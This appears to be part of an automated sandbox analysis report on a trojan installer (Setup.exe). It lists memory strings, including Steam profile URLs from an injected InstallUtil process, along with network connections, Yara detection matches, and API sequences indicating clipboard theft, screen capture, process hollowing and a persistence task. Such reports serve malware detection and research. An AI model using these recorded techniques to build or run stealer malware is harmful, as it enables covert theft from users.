          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/badges/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/badges/1
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/badges/13
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/badges/https://steamcommunity.com/profiles/765
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/games/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/games/?tab=all
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/games/?tab=allhttps://steamcommunity.com/profi
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/games/commentthread_Profile_76561198043764602_
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/inventory/profile_recentgame_header
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/stats/34830/achievements/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A4000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602/stats/40100/achievements/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000190C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198043764602https://steamcommunity.com/profiles/76561198257
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001970000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.000000000190C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561198257089751
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199003164182
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000180E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199003164182https://steamcommunity.com/profiles/76561199003
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/https://store.steampowered.com/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018C0000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000019D6000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2492246626.00000000018D2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/responsive_page_content_overlayhttps://store.steampowered.com/Link
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.0000000001888000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000002.00000002.1280387098.00000000055D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: AutoIt3.exe.12.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: 7LUEA3.pif, 0000000C.00000003.1615820993.00000000099C0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1614368517.0000000009321000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716572253.00000000098E0000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif.5.dr, AutoIt3.exe.12.drString found in binary or memory: https://www.globalsign.com/repository/06
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.c0yfKF26qNRb
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.w0HgyL2ZPBj2
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: msiexec.exe, 00000005.00000003.1343095048.000000000681F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018A6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0030DA40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0030DA40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0030DA40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_0030DA40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0030E145 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,5_2_0030E145
          Source: Yara matchFile source: Process Memory Space: 7LUEA3.pif PID: 6400, type: MEMORYSTR
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015564D9 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,12_2_015564D9

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: Setup.exe, type: SAMPLEMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 Author: unknown
          Source: 0.0.Setup.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 Author: unknown
          Source: 00000000.00000000.1186904367.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 Author: unknown
          Source: 00000000.00000002.1205380161.00000000037EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 Author: unknown
          Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_008EDABA NtQuerySystemInformation,0_2_008EDABA
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01559961 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,12_2_01559961
          Source: C:\Windows\SysWOW64\choice.exeFile created: C:\Windows\Tasks\ROG Live Service.jobJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003138705_2_00313870
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002F011D5_2_002F011D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002FE9CF5_2_002FE9CF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00313BA05_2_00313BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003023D05_2_003023D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E8C605_2_002E8C60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003074AA5_2_003074AA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003164805_2_00316480
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002EB5605_2_002EB560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003087E95_2_003087E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0030381F5_2_0030381F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002EB0505_2_002EB050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003168B05_2_003168B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003128BC5_2_003128BC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031C0A25_2_0031C0A2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0030009E5_2_0030009E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003038885_2_00303888
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E30905_2_002E3090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E60C05_2_002E60C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003000C05_2_003000C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031C1305_2_0031C130
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031A9305_2_0031A930
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003029395_2_00302939
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003149185_2_00314918
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003131405_2_00313140
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002EC9BE5_2_002EC9BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003041F05_2_003041F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0030B9D05_2_0030B9D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003059C25_2_003059C2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031DA005_2_0031DA00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002F0A635_2_002F0A63
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E7AA05_2_002E7AA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E3AA05_2_002E3AA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002F62BA5_2_002F62BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002FCAB05_2_002FCAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00304B365_2_00304B36
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003063005_2_00306300
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031AB705_2_0031AB70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0030AB615_2_0030AB61
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003033585_2_00303358
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E9B505_2_002E9B50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002FE3505_2_002FE350
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002FA3805_2_002FA380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002ECBE15_2_002ECBE1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003053D45_2_003053D4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031D4305_2_0031D430
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002FB4205_2_002FB420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002F44205_2_002F4420
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002F4C0D5_2_002F4C0D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E6C105_2_002E6C10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002EE4605_2_002EE460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E44705_2_002E4470
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00307CAB5_2_00307CAB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031B4805_2_0031B480
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031BCF05_2_0031BCF0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002F84F55_2_002F84F5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E2CD05_2_002E2CD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031DD105_2_0031DD10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031C5105_2_0031C510
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00301D125_2_00301D12
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002F35B05_2_002F35B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E65805_2_002E6580
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031BE205_2_0031BE20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002F9E505_2_002F9E50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00312EE05_2_00312EE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00300EE75_2_00300EE7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E86C05_2_002E86C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E96D05_2_002E96D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002FF7285_2_002FF728
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002F97305_2_002F9730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031D7005_2_0031D700
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003017705_2_00301770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00316F705_2_00316F70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E8F405_2_002E8F40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002FFF405_2_002FFF40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003027405_2_00302740
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0031AFA05_2_0031AFA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E578F5_2_002E578F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E4F905_2_002E4F90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_002E6F905_2_002E6F90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_003087F25_2_003087F2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0030AFF35_2_0030AFF3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061885FC5_2_061885FC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061973A65_2_061973A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0619ABD65_2_0619ABD6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_061871005_2_06187100
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C63DE812_3_09C63DE8
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C4818812_3_09C48188
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09CA4D4812_3_09CA4D48
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C5092812_3_09C50928
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C43CF812_3_09C43CF8
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C664B812_3_09C664B8
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C6386812_3_09C63868
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09CA3C7812_3_09CA3C78
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C9E83812_3_09C9E838
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C65B5812_3_09C65B58
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C40F1812_3_09C40F18
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C4931812_3_09C49318
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C40E4812_3_09C40E48
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C98A6812_3_09C98A68
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C4E21812_3_09C4E218
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C6462812_3_09C64628
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_3_09C5EE3812_3_09C5EE38
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015592B212_2_015592B2
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_015592B912_2_015592B9
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01543E9D12_2_01543E9D
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\7LUEA3.pif 1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 002E84D0 appears 36 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 002F3240 appears 73 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 06188B50 appears 55 times
          Source: Setup.exeStatic PE information: invalid certificate
          Source: Setup.exeStatic PE information: Resource name: RT_RCDATA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: Setup.exeStatic PE information: Number of sections : 11 > 10
          Source: Setup.exe, 00000000.00000002.1210135833.000000000447C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Setup.exe
          Source: Setup.exe, 00000000.00000002.1213765321.000000000511D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Setup.exe
          Source: Setup.exe, 00000000.00000002.1211394304.0000000004813000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezip.exe( vs Setup.exe
          Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Setup.exe, type: SAMPLEMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 reference_sample = 1dd15c830c0a159b53ed21b8c2ce1b7e8093256368d7b96c1347c6851ee6c4f6, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remotemanipulator, fingerprint = 02220e8af70ecffb3a7585f756c59ef5d9e17e6690c36d6bffc458e1d17dbd0c, id = 9ec52153-3b62-432d-b87c-895035df1a46, last_modified = 2022-01-13
          Source: 0.0.Setup.exe.8d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 reference_sample = 1dd15c830c0a159b53ed21b8c2ce1b7e8093256368d7b96c1347c6851ee6c4f6, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remotemanipulator, fingerprint = 02220e8af70ecffb3a7585f756c59ef5d9e17e6690c36d6bffc458e1d17dbd0c, id = 9ec52153-3b62-432d-b87c-895035df1a46, last_modified = 2022-01-13
          Source: 00000000.00000000.1186904367.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 reference_sample = 1dd15c830c0a159b53ed21b8c2ce1b7e8093256368d7b96c1347c6851ee6c4f6, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remotemanipulator, fingerprint = 02220e8af70ecffb3a7585f756c59ef5d9e17e6690c36d6bffc458e1d17dbd0c, id = 9ec52153-3b62-432d-b87c-895035df1a46, last_modified = 2022-01-13
          Source: 00000000.00000002.1205380161.00000000037EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remotemanipulator_9ec52153 reference_sample = 1dd15c830c0a159b53ed21b8c2ce1b7e8093256368d7b96c1347c6851ee6c4f6, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remotemanipulator, fingerprint = 02220e8af70ecffb3a7585f756c59ef5d9e17e6690c36d6bffc458e1d17dbd0c, id = 9ec52153-3b62-432d-b87c-895035df1a46, last_modified = 2022-01-13
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/8@3/4
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pifCode function: 12_2_01544AED GetDiskFreeSpaceA,12_2_01544AED
